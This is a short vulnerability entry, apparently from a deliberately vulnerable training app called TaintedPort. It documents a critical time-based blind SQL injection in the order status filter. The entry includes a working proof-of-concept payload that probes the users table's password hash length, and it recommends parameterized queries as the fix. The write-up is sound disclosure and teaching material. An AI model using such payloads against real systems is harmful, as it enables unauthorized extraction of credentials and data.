Blind SQL Injection - Order Status Filter
TaintedPort
Vuln ID
TP-005
Title
Blind SQL Injection - Order Status Filter
Severity
critical
Type
SQLi
HTTP Method
GET
URL
/orders
Parameter
status
Filename
-
Code Location
backend/api/models/Order.php -> getByUserFiltered() line 85
Description
The order listing endpoint accepts a status filter that is concatenated directly into the SQL query. This enables time-based blind SQL injection.
Proof of Concept
status=pending' AND 1=CASE WHEN (SELECT length(password_hash) FROM users WHERE id=1)>50 THEN RANDOMBLOB(200000000) ELSE 1 END--Remediation
Use a parameterized query with bound parameters.